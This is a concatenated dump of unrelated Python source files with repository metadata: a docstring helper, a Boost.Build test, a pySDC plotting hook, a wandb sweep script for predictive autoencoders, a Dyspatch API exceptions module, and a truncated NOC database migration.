for line in lines[ignore:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation from ignored lines.
for i in range(ignore):
if i < len(lines):
lines[i] = lines[i].lstrip()
if margin < sys.maxsize:
for i in range(ignore, len(lines)):
lines[i] = lines[i][margin:]
# Remove any leading blank lines.
while lines and not lines[0]:
lines.pop(0)
# make sure there is an empty line at the end
if lines and lines[-1]:
lines.append('')
return lines
def prepare_commentdoc(s):
# type: (unicode) -> List[unicode]
"""Extract documentation comment lines (starting with #:) and return them
as a list of lines. Returns an empty list if there is no documentation.
"""
result = []
lines = [line.strip() for line in s.expandtabs().splitlines()]
for line in lines:
if line.startswith('#:'):
line = line[2:]
# the first space after the comment is ignored
if line and line[0] == ' ':
line = line[1:]
result.append(line)
if result and result[-1]:
result.append('')
return result
| 32.014286
| 80
| 0.616243
|
4a0a0e061265abd4d22cf40f80b8be924b1687c6
| 2,263
|
py
|
Python
|
test/builtin_split_by_characters.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
test/builtin_split_by_characters.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
test/builtin_split_by_characters.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
#!/usr/bin/python
# Copyright 2012. Jurko Gospodnetic
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# This tests the SPLIT_BY_CHARACTERS rule.
import BoostBuild
def test_invalid(params, expected_error_line):
t = BoostBuild.Tester(pass_toolset=0)
t.write("file.jam", "SPLIT_BY_CHARACTERS %s ;" % params)
t.run_build_system(["-ffile.jam"], status=1)
t.expect_output_lines("[*] %s" % expected_error_line)
t.cleanup()
def test_valid():
t = BoostBuild.Tester(pass_toolset=0)
t.write("jamroot.jam", """\
import assert ;
assert.result FooBarBaz : SPLIT_BY_CHARACTERS FooBarBaz : "" ;
assert.result FooBarBaz : SPLIT_BY_CHARACTERS FooBarBaz : x ;
assert.result FooBa Baz : SPLIT_BY_CHARACTERS FooBarBaz : r ;
assert.result FooBa Baz : SPLIT_BY_CHARACTERS FooBarBaz : rr ;
assert.result FooBa Baz : SPLIT_BY_CHARACTERS FooBarBaz : rrr ;
assert.result FooB rB z : SPLIT_BY_CHARACTERS FooBarBaz : a ;
assert.result FooB B z : SPLIT_BY_CHARACTERS FooBarBaz : ar ;
assert.result ooBarBaz : SPLIT_BY_CHARACTERS FooBarBaz : F ;
assert.result FooBarBa : SPLIT_BY_CHARACTERS FooBarBaz : z ;
assert.result ooBarBa : SPLIT_BY_CHARACTERS FooBarBaz : Fz ;
assert.result F B rB z : SPLIT_BY_CHARACTERS FooBarBaz : oa ;
assert.result Alib b : SPLIT_BY_CHARACTERS Alibaba : oa ;
assert.result libaba : SPLIT_BY_CHARACTERS Alibaba : oA ;
assert.result : SPLIT_BY_CHARACTERS FooBarBaz : FooBarBaz ;
assert.result : SPLIT_BY_CHARACTERS FooBarBaz : FoBarz ;
# Questionable results - should they return an empty string or an empty list?
assert.result : SPLIT_BY_CHARACTERS "" : "" ;
assert.result : SPLIT_BY_CHARACTERS "" : x ;
assert.result : SPLIT_BY_CHARACTERS "" : r ;
assert.result : SPLIT_BY_CHARACTERS "" : rr ;
assert.result : SPLIT_BY_CHARACTERS "" : rrr ;
assert.result : SPLIT_BY_CHARACTERS "" : oa ;
""")
t.run_build_system()
t.cleanup()
test_invalid("", "missing argument string")
test_invalid("Foo", "missing argument delimiters")
test_invalid(": Bar", "missing argument string")
test_invalid("a : b : c", "extra argument c")
test_invalid("a b : c", "extra argument b")
test_invalid("a : b c", "extra argument c")
test_valid()
| 39.017241
| 77
| 0.743261
|
4a0a0e084432a089e714af414ea79035cc046eea
| 4,374
|
py
|
Python
|
pySDC/playgrounds/Boris/penningtrap_HookClass.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 20
|
2015-03-21T09:02:55.000Z
|
2022-02-26T20:22:21.000Z
|
pySDC/playgrounds/Boris/penningtrap_HookClass.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 61
|
2015-03-02T09:35:55.000Z
|
2022-03-17T12:42:48.000Z
|
pySDC/playgrounds/Boris/penningtrap_HookClass.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 19
|
2015-02-20T11:52:33.000Z
|
2022-02-02T10:46:27.000Z
|
import matplotlib.pyplot as plt
import numpy as np
# import progressbar
from pySDC.core.Hooks import hooks
class particles_output(hooks):
def __init__(self):
"""
Initialization of particles output
"""
super(particles_output, self).__init__()
fig = plt.figure()
self.ax = fig.add_subplot(111, projection='3d')
self.ax.set_xlim3d([-20, 20])
self.ax.set_ylim3d([-20, 20])
self.ax.set_zlim3d([-20, 20])
plt.ion()
self.sframe = None
self.bar_run = None
def pre_run(self, step, level_number):
"""
Overwrite default routine called before time-loop starts
Args:
step: the current step
level_number: the current level number
"""
super(particles_output, self).pre_run(step, level_number)
# some abbreviations
L = step.levels[level_number]
# if hasattr(L.prob.params, 'Tend'):
# self.bar_run = progressbar.ProgressBar(max_value=L.prob.params.Tend)
# else:
# self.bar_run = progressbar.ProgressBar(max_value=progressbar.UnknownLength)
part = L.u[0]
N = L.prob.params.nparts
w = np.array([1, 1, -2])
# compute (slowly..) the potential at u0
fpot = np.zeros(N)
for i in range(N):
# inner loop, omit ith particle
for j in range(0, i):
dist2 = np.linalg.norm(part.pos[:, i] - part.pos[:, j], 2) ** 2 + L.prob.params.sig ** 2
fpot[i] += part.q[j] / np.sqrt(dist2)
for j in range(i + 1, N):
dist2 = np.linalg.norm(part.pos[:, i] - part.pos[:, j], 2) ** 2 + L.prob.params.sig ** 2
fpot[i] += part.q[j] / np.sqrt(dist2)
fpot[i] -= L.prob.params.omega_E ** 2 * part.m[i] / part.q[i] / 2.0 * \
np.dot(w, part.pos[:, i] * part.pos[:, i])
# add up kinetic and potntial contributions to total energy
epot = 0
ekin = 0
for n in range(N):
epot += part.q[n] * fpot[n]
ekin += part.m[n] / 2.0 * np.dot(part.vel[:, n], part.vel[:, n])
self.add_to_stats(process=step.status.slot, time=L.time, level=L.level_index, iter=0,
sweep=L.status.sweep, type='etot', value=epot + ekin)
def post_step(self, step, level_number):
"""
Default routine called after each iteration
Args:
step: the current step
level_number: the current level number
"""
super(particles_output, self).post_step(step, level_number)
# some abbreviations
L = step.levels[level_number]
# self.bar_run.update(L.time)
L.sweep.compute_end_point()
part = L.uend
N = L.prob.params.nparts
w = np.array([1, 1, -2])
# compute (slowly..) the potential at uend
fpot = np.zeros(N)
for i in range(N):
# inner loop, omit ith particle
for j in range(0, i):
dist2 = np.linalg.norm(part.pos[:, i] - part.pos[:, j], 2) ** 2 + L.prob.params.sig ** 2
fpot[i] += part.q[j] / np.sqrt(dist2)
for j in range(i + 1, N):
dist2 = np.linalg.norm(part.pos[:, i] - part.pos[:, j], 2) ** 2 + L.prob.params.sig ** 2
fpot[i] += part.q[j] / np.sqrt(dist2)
fpot[i] -= L.prob.params.omega_E ** 2 * part.m[i] / part.q[i] / 2.0 * \
np.dot(w, part.pos[:, i] * part.pos[:, i])
# add up kinetic and potntial contributions to total energy
epot = 0
ekin = 0
for n in range(N):
epot += part.q[n] * fpot[n]
ekin += part.m[n] / 2.0 * np.dot(part.vel[:, n], part.vel[:, n])
self.add_to_stats(process=step.status.slot, time=L.time, level=L.level_index, iter=step.status.iter,
sweep=L.status.sweep, type='etot', value=epot + ekin)
oldcol = self.sframe
# # self.sframe = self.ax.scatter(L.uend.pos[0],L.uend.pos[1],L.uend.pos[2])
self.sframe = self.ax.scatter(L.uend.pos[0::3], L.uend.pos[1::3], L.uend.pos[2::3])
# Remove old line collection before drawing
if oldcol is not None:
self.ax.collections.remove(oldcol)
plt.pause(0.001)
return None
| 35.852459
| 108
| 0.536351
|
4a0a0e19abf4d64888dd0f7b3ad5d9b610f2226d
| 23,599
|
py
|
Python
|
ddganAE/wandb/train_wandb_pred_fpc.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
ddganAE/wandb/train_wandb_pred_fpc.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
ddganAE/wandb/train_wandb_pred_fpc.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
"""
Functions used for weights and biases hyperparameter optimization of
predictive models on slug flow dataset.
"""
import wandb
import tensorflow as tf
import argparse
import os
import json
import keras
from sklearn.preprocessing import MinMaxScaler
from ddganAE.models import Predictive_adversarial, Predictive
from ddganAE.architectures.svdae import (
build_vinicius_encoder_decoder,
build_slimmer_vinicius_encoder_decoder,
build_smaller_vinicius_encoder_decoder,
build_dense_decoder,
build_deeper_dense_encoder,
build_dense_encoder,
build_slimmer_dense_decoder,
build_wider_dense_decoder,
build_wider_dense_encoder,
build_deeper_dense_decoder,
build_slimmer_dense_encoder,
)
from ddganAE.architectures.discriminators import (
build_custom_discriminator,
build_custom_wider_discriminator
)
import numpy as np
__author__ = "Zef Wolffs"
__credits__ = []
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "Zef Wolffs"
__email__ = "zefwolffs@gmail.com"
__status__ = "Development"
def train_wandb_pred_aae(config=None):
"""
Construct and subsequently train the model while reporting losses to
weights and biases platform. Weights and biases also controls
hyperparameters.
Args:
config (dict, optional): Dictionary with hyperparameters, set by
weights and biases. Defaults to None.
"""
with wandb.init(config=config, tags=["central_doms_pred_mse"]):
# If called by wandb.agent, as below,
# this config will be set by Sweep Controller
config = wandb.config
# Data processing
latent_vars = np.load(config.datafile)
nfiles = int(latent_vars.shape[0]/config.domains)
latent_vars_reshaped = np.moveaxis(
latent_vars.reshape(nfiles, config.domains, config.in_vars),
0, 2)
train_data = latent_vars_reshaped[:config.domains]
# Scaling the latent variables
scaler = MinMaxScaler((-1, 1))
train_data = scaler.fit_transform(
train_data.reshape(-1, 1)).reshape(train_data.shape)
initializer = tf.keras.initializers.RandomNormal(
mean=0.0, stddev=0.05, seed=None
)
if config.optimizer == "nadam":
optimizer = tf.keras.optimizers.Nadam(
lr=config.learning_rate,
beta_1=config.momentum,
beta_2=config.beta_2,
)
elif config.optimizer == "adam":
optimizer = tf.keras.optimizers.Adam(
lr=config.learning_rate,
beta_1=config.momentum,
beta_2=config.beta_2,
)
elif config.optimizer == "sgd":
optimizer = tf.keras.optimizers.SGD(
learning_rate=config.learning_rate, momentum=config.momentum
)
if config.architecture == "dense":
encoder = build_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
)
decoder = build_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "deeper_dense":
encoder = build_deeper_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout
)
decoder = build_deeper_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "wider_dense":
encoder = build_wider_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout
)
decoder = build_wider_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "slimmer_dense":
encoder = build_slimmer_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout
)
decoder = build_slimmer_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "vinicius":
encoder, decoder = build_vinicius_encoder_decoder(
config.in_vars,
config.latent_vars,
initializer,
act=config.activation,
dense_act=config.dense_activation,
dropout=config.dropout,
reg=config.regularization,
batchnorm=config.batch_normalization,
final_act=config.final_act
)
elif config.architecture == "smaller_vinicius":
encoder, decoder = build_smaller_vinicius_encoder_decoder(
config.in_vars,
config.latent_vars,
initializer,
act=config.activation,
dense_act=config.dense_activation,
dropout=config.dropout,
reg=config.regularization,
batchnorm=config.batch_normalization,
final_act=config.final_act
)
elif config.architecture == "slimmer_vinicius":
encoder, decoder = build_slimmer_vinicius_encoder_decoder(
config.in_vars,
config.latent_vars,
initializer,
act=config.activation,
dense_act=config.dense_activation,
dropout=config.dropout,
reg=config.regularization,
batchnorm=config.batch_normalization,
final_act=config.final_act
)
if config.discriminator_architecture == "custom":
discriminator = build_custom_discriminator(
config.latent_vars, initializer, info=False
)
elif config.discriminator_architecture == "custom_wider":
discriminator = build_custom_wider_discriminator(
config.latent_vars, initializer, info=False
)
pred_adv = Predictive_adversarial(encoder, decoder, discriminator,
optimizer)
pred_adv.compile(config.in_vars, increment=config.increment)
pred_adv.train(
train_data,
config.epochs,
interval=config.interval,
batch_size=config.batch_size,
val_size=0.1,
wandb_log=True,
noise_std=config.noise_std,
n_discriminator=config.n_discriminator,
n_gradient_ascent=config.n_gradient_ascent
)
# Check how well the model actually performs to also predict the
# results
# Create boundaries and initial values arrays for prediction later
boundaries = np.zeros((2, config.in_vars, nfiles))
boundaries[0] = train_data[0]
boundaries[1] = train_data[3]
init_values = np.zeros((2, config.in_vars))
init_values[0] = train_data[1][:, 0]
init_values[1] = train_data[2][:, 0]
predicted = pred_adv.predict(boundaries, init_values,
int(nfiles/config.interval)-1, iters=3)
train_data_int = train_data[:, :, ::config.interval]
mse = tf.keras.losses.MeanSquaredError()
mse_pred = mse(predicted[:, :, :int(nfiles/config.interval)-2],
train_data_int[:, :, :int(nfiles/config.interval)-2])\
.numpy()
log = {"prediction_mse": mse_pred}
wandb.log(log)
if config.savemodel:
dirname = "model_" + wandb.run.name
os.mkdir(dirname)
pred_adv.encoder.save(dirname + '/encoder')
pred_adv.decoder.save(dirname + '/decoder')
def train_wandb_pred_ae(config=None):
"""
Construct and subsequently train the model while reporting losses to
weights and biases platform. Weights and biases also controls
hyperparameters.
Args:
config (dict, optional): Dictionary with hyperparameters, set by
weights and biases. Defaults to None.
"""
with wandb.init(config=config, tags=["central_doms_pred_mse"]):
# If called by wandb.agent, as below,
# this config will be set by Sweep Controller
config = wandb.config
# Data processing
latent_vars = np.load(config.datafile)
nfiles = int(latent_vars.shape[0]/config.domains)
latent_vars_reshaped = np.moveaxis(
latent_vars.reshape(nfiles, config.domains, config.in_vars),
0, 2)
train_data = latent_vars_reshaped[:config.domains]
# Scaling the latent variables
scaler = MinMaxScaler((-1, 1))
train_data = scaler.fit_transform(
train_data.reshape(-1, 1)).reshape(train_data.shape)
initializer = tf.keras.initializers.RandomNormal(
mean=0.0, stddev=0.05, seed=None
)
if config.optimizer == "nadam":
optimizer = tf.keras.optimizers.Nadam(
lr=config.learning_rate,
beta_1=config.momentum,
beta_2=config.beta_2,
)
elif config.optimizer == "adam":
optimizer = tf.keras.optimizers.Adam(
lr=config.learning_rate,
beta_1=config.momentum,
beta_2=config.beta_2,
)
elif config.optimizer == "sgd":
optimizer = tf.keras.optimizers.SGD(
learning_rate=config.learning_rate, momentum=config.momentum
)
if config.architecture == "dense":
encoder = build_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
)
decoder = build_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "deeper_dense":
encoder = build_deeper_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout
)
decoder = build_deeper_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "wider_dense":
encoder = build_wider_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout
)
decoder = build_wider_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "slimmer_dense":
encoder = build_slimmer_dense_encoder(
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout
)
decoder = build_slimmer_dense_decoder(
config.in_vars,
config.latent_vars,
initializer,
info=False,
act=config.activation,
dropout=config.dropout,
final_act=config.final_act
)
elif config.architecture == "vinicius":
encoder, decoder = build_vinicius_encoder_decoder(
config.in_vars,
config.latent_vars,
initializer,
act=config.activation,
dense_act=config.dense_activation,
dropout=config.dropout,
reg=config.regularization,
batchnorm=config.batch_normalization,
final_act=config.final_act
)
elif config.architecture == "smaller_vinicius":
encoder, decoder = build_smaller_vinicius_encoder_decoder(
config.in_vars,
config.latent_vars,
initializer,
act=config.activation,
dense_act=config.dense_activation,
dropout=config.dropout,
reg=config.regularization,
batchnorm=config.batch_normalization,
final_act=config.final_act
)
elif config.architecture == "slimmer_vinicius":
encoder, decoder = build_slimmer_vinicius_encoder_decoder(
config.in_vars,
config.latent_vars,
initializer,
act=config.activation,
dense_act=config.dense_activation,
dropout=config.dropout,
reg=config.regularization,
batchnorm=config.batch_normalization,
final_act=config.final_act
)
pred_adv = Predictive(encoder, decoder,
optimizer)
pred_adv.compile(config.in_vars, increment=config.increment)
pred_adv.train(
train_data,
config.epochs,
interval=config.interval,
batch_size=config.batch_size,
val_size=0.1,
wandb_log=True,
noise_std=config.noise_std
)
# Check how well the model actually performs to also predict the
# results
# Create boundaries and initial values arrays for prediction later
boundaries = np.zeros((2, config.in_vars, nfiles))
boundaries[0] = train_data[0]
boundaries[1] = train_data[3]
init_values = np.zeros((2, config.in_vars))
init_values[0] = train_data[1][:, 0]
init_values[1] = train_data[2][:, 0]
predicted = pred_adv.predict(boundaries, init_values,
int(nfiles/config.interval)-1, iters=3)
train_data_int = train_data[:, :, ::config.interval]
mse = tf.keras.losses.MeanSquaredError()
mse_pred = mse(predicted[:, :, :int(nfiles/config.interval)-2],
train_data_int[:, :, :int(nfiles/config.interval)-2])\
.numpy()
log = {"prediction_mse": mse_pred}
wandb.log(log)
if config.savemodel:
dirname = "model_" + wandb.run.name
os.mkdir(dirname)
pred_adv.encoder.save(dirname + '/encoder')
pred_adv.decoder.save(dirname + '/decoder')
# Configuration options for hyperparameter optimization
Predictive_adversarial_sweep_config = {
"method": "random",
"metric": {"name": "prediction_mse", "goal": "minimize"},
"parameters": {
"architecture": {
"values": [
"dense",
"deeper_dense",
"wider_dense",
"slimmer_dense",
"vinicius",
"smaller_vinicius",
"slimmer_vinicius",
]
},
"activation": {"values": ["relu", "elu", "sigmoid", "tanh"]},
"discriminator_architecture": {"values": ["custom", "custom_wider"]},
"in_vars": {"values": [10]},
"dense_activation": {"values": ["relu", "linear"]},
"batch_size": {"values": [32, 64, 128]},
"learning_rate": {"values": [5e-3, 5e-4, 5e-5]},
"dropout": {"values": [0.3, 0.55, 0.8]},
"optimizer": {"values": ["nadam", "adam", "sgd"]},
"momentum": {"values": [0.8, 0.9, 0.98]},
"beta_2": {"values": [0.9, 0.999, 0.99999]},
"batch_normalization": {"values": [True, False]},
"regularization": {"values": [1e-3, 1e-4, 1e-5, 1e-6, 0]},
"savemodel": {"values": [False]},
"latent_vars": {"values": [30, 60, 100, 300]},
"interval": {"values": [1, 2, 4, 6]},
"final_act": {
"values": [
"linear",
"sigmoid",
"tanh"
]
},
"noise_std": {"values": [0.00001, 0.001, 0.01, 0.05, 0.1]},
"increment": {"values": [True, False]},
"epochs": {"values": [100, 200, 500, 1000]},
"n_discriminator": {"values": [1, 2, 4, 5]},
"n_gradient_ascent": {"values": [3, 8, 15, 30]},
"domains": {"values": [4]}
},
}
# Configuration options for hyperparameter optimization
Predictive_ae_sweep_config = {
"method": "random",
"metric": {"name": "prediction_mse", "goal": "minimize"},
"parameters": {
"architecture": {
"values": [
"dense",
"deeper_dense",
"wider_dense",
"slimmer_dense",
"vinicius",
"smaller_vinicius",
"slimmer_vinicius",
]
},
"activation": {"values": ["relu", "elu", "sigmoid", "tanh"]},
"in_vars": {"values": [10]},
"dense_activation": {"values": ["relu", "linear"]},
"batch_size": {"values": [32, 64, 128]},
"learning_rate": {"values": [5e-3, 5e-4, 5e-5]},
"dropout": {"values": [0.3, 0.55, 0.8]},
"optimizer": {"values": ["nadam", "adam", "sgd"]},
"momentum": {"values": [0.8, 0.9, 0.98]},
"beta_2": {"values": [0.9, 0.999, 0.99999]},
"batch_normalization": {"values": [True, False]},
"regularization": {"values": [1e-3, 1e-4, 1e-5, 1e-6, 0]},
"savemodel": {"values": [False]},
"latent_vars": {"values": [30, 60, 100, 300]},
"interval": {"values": [1, 2, 4, 6]},
"final_act": {
"values": [
"linear",
"sigmoid",
"tanh"
]
},
"noise_std": {"values": [0.00001, 0.001, 0.01, 0.05, 0.1]},
"increment": {"values": [True, False]},
"epochs": {"values": [100, 200, 500, 1000]},
"domains": {"values": [4]}
},
}
# Build a small CLI
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Do hyperparameter \
optimization on FPC dataset")
parser.add_argument('--datafile', type=str, nargs='?',
default="/home/zef/Documents/master/acse-9/DD-GAN-AE/\
submodules/DD-GAN/data/processed/cae_latent_sf_10vars_800steps_different.npy",
help='path to structured grid data file')
parser.add_argument('--savemodel', type=str, nargs='?',
default="False",
help='Wether or not to save the models, set "True" for \
saving')
parser.add_argument('--niters', type=int, nargs='?',
default=200,
help='Number of sweeps to execute')
parser.add_argument('--custom_config', type=str, nargs='?',
default=None,
help='json file with custom configurations for sweep')
parser.add_argument('--continuous', action='store_true', default=False,
help='whether to use continuous learning \
functionality')
parser.add_argument('--encoder_folder', type=str, nargs='?',
default=None,
help='folder with autoencoder for generating latent \
variables')
parser.add_argument('--model', type=str, nargs='?',
default=None,
help='Choose either ae (normal autoencoder) or aae \
(adversarial autoencoder)')
args = parser.parse_args()
arg_dict = vars(args)
if args.continuous:
if arg_dict['custom_config'] is not None:
with open(arg_dict["custom_config"]) as json_file:
Continuous_predictive_adversarial_sweep_config = \
json.load(json_file)
if arg_dict["savemodel"] == "True":
Continuous_predictive_adversarial_sweep_config['parameters'][
'savemodel'] = \
{'values': [True]}
Continuous_predictive_adversarial_sweep_config['parameters'][
'datafile'] = \
{'values': [arg_dict['datafile']]}
Continuous_predictive_adversarial_sweep_config['parameters'][
'encoder_folder'] = \
{'values': [arg_dict['encoder_folder']]}
sweep_id = wandb.sweep(Continuous_predictive_adversarial_sweep_config,
project='pred-aae', entity='zeff020')
wandb.agent(sweep_id, continuous_train_wandb_pred_aae,
count=arg_dict['niters'])
if args.model == "ae":
# Use the normal autoencoder for predictions
if arg_dict['custom_config'] is not None:
with open(arg_dict["custom_config"]) as json_file:
Predictive_ae_sweep_config = json.load(json_file)
if arg_dict["savemodel"] == "True":
Predictive_ae_sweep_config['parameters']['savemodel'] = \
{'values': [True]}
Predictive_ae_sweep_config['parameters']['datafile'] = \
{'values': [arg_dict['datafile']]}
sweep_id = wandb.sweep(Predictive_ae_sweep_config,
project='pred-ae-fpc', entity='zeff020')
wandb.agent(sweep_id, train_wandb_pred_ae, count=arg_dict['niters'])
elif args.model == "aae":
# Use the adversarial autoencoder for predictions
if arg_dict['custom_config'] is not None:
with open(arg_dict["custom_config"]) as json_file:
Predictive_adversarial_sweep_config = json.load(json_file)
if arg_dict["savemodel"] == "True":
Predictive_adversarial_sweep_config['parameters']['savemodel'] = \
{'values': [True]}
Predictive_adversarial_sweep_config['parameters']['datafile'] = \
{'values': [arg_dict['datafile']]}
sweep_id = wandb.sweep(Predictive_adversarial_sweep_config,
project='pred-aae-fpc', entity='zeff020')
wandb.agent(sweep_id, train_wandb_pred_aae, count=arg_dict['niters'])
| 37.34019
| 80
| 0.553159
|
4a0a0e32860dca9f20516811ec5d5c2bd587c244
| 4,545
|
py
|
Python
|
dyspatch_client/exceptions.py
|
getdyspatch/dyspatch-python
|
23ffb05eff820944acf235fa3b225bf8caec903d
|
[
"Apache-2.0"
] | null | null | null |
dyspatch_client/exceptions.py
|
getdyspatch/dyspatch-python
|
23ffb05eff820944acf235fa3b225bf8caec903d
|
[
"Apache-2.0"
] | null | null | null |
dyspatch_client/exceptions.py
|
getdyspatch/dyspatch-python
|
23ffb05eff820944acf235fa3b225bf8caec903d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Dyspatch API
# Introduction The Dyspatch API is based on the REST paradigm, and features resource based URLs with standard HTTP response codes to indicate errors. We use standard HTTP authentication and request verbs, and all responses are JSON formatted. See our [Implementation Guide](https://docs.dyspatch.io/development/implementing_dyspatch/) for more details on how to implement Dyspatch. ## API Client Libraries Dyspatch provides API Clients for popular languages and web frameworks. - [Java](https://github.com/getdyspatch/dyspatch-java) - [Javascript](https://github.com/getdyspatch/dyspatch-javascript) - [Python](https://github.com/getdyspatch/dyspatch-python) - [C#](https://github.com/getdyspatch/dyspatch-dotnet) - [Go](https://github.com/getdyspatch/dyspatch-golang) - [Ruby](https://github.com/getdyspatch/dyspatch-ruby) # noqa: E501
The version of the OpenAPI document: 2020.11
Contact: support@dyspatch.io
Generated by: https://openapi-generator.tech
"""
import six
class OpenApiException(Exception):
"""The base exception class for all OpenAPIExceptions"""
class ApiTypeError(OpenApiException, TypeError):
def __init__(self, msg, path_to_item=None, valid_classes=None,
key_type=None):
""" Raises an exception for TypeErrors
Args:
msg (str): the exception message
Keyword Args:
path_to_item (list): a list of keys an indices to get to the
current_item
None if unset
valid_classes (tuple): the primitive classes that current item
should be an instance of
None if unset
key_type (bool): False if our value is a value in a dict
True if it is a key in a dict
False if our item is an item in a list
None if unset
"""
self.path_to_item = path_to_item
self.valid_classes = valid_classes
self.key_type = key_type
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiTypeError, self).__init__(full_msg)
class ApiValueError(OpenApiException, ValueError):
def __init__(self, msg, path_to_item=None):
"""
Args:
msg (str): the exception message
Keyword Args:
path_to_item (list) the path to the exception in the
received_data dict. None if unset
"""
self.path_to_item = path_to_item
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiValueError, self).__init__(full_msg)
class ApiKeyError(OpenApiException, KeyError):
def __init__(self, msg, path_to_item=None):
"""
Args:
msg (str): the exception message
Keyword Args:
path_to_item (None/list) the path to the exception in the
received_data dict
"""
self.path_to_item = path_to_item
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiKeyError, self).__init__(full_msg)
class ApiException(OpenApiException):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
def render_path(path_to_item):
"""Returns a string representation of a path"""
result = ""
for pth in path_to_item:
if isinstance(pth, six.integer_types):
result += "[{0}]".format(pth)
else:
result += "['{0}']".format(pth)
return result
| 37.254098
| 845
| 0.607921
|
4a0a0e33aceedad16ba0891672cc2d4e6d65f6bb
| 1,859
|
py
|
Python
|
ip/migrations/0004_default_vrf.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
ip/migrations/0004_default_vrf.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
ip/migrations/0004_default_vrf.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ----------------------------------------------------------------------
# default vrf
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
depends_on = [("peer", "0017_default_maintainer")]
def migrate(self):
if self.db.execute("SELECT COUNT(*) FROM ip_vrfgroup")[0][0] == 0:
self.db.execute("INSERT INTO ip_vrfgroup(name) VALUES(%s)", ["default"])
if self.db.execute("SELECT COUNT(*) FROM peer_as WHERE asn=%s", [0])[0][0] == 0:
maintainer_id = self.db.execute("SELECT id FROM peer_maintainer LIMIT 1")[0][0]
self.db.execute(
"INSERT INTO peer_as(asn,description,maintainer_id) VALUES(%s,%s,%s)",
[0, "Default", maintainer_id],
)
if self.db.execute("SELECT COUNT(*) FROM ip_vrf")[0][0] == 0:
vg_id = self.db.execute("SELECT id FROM ip_vrfgroup LIMIT 1")[0][0]
self.db.execute(
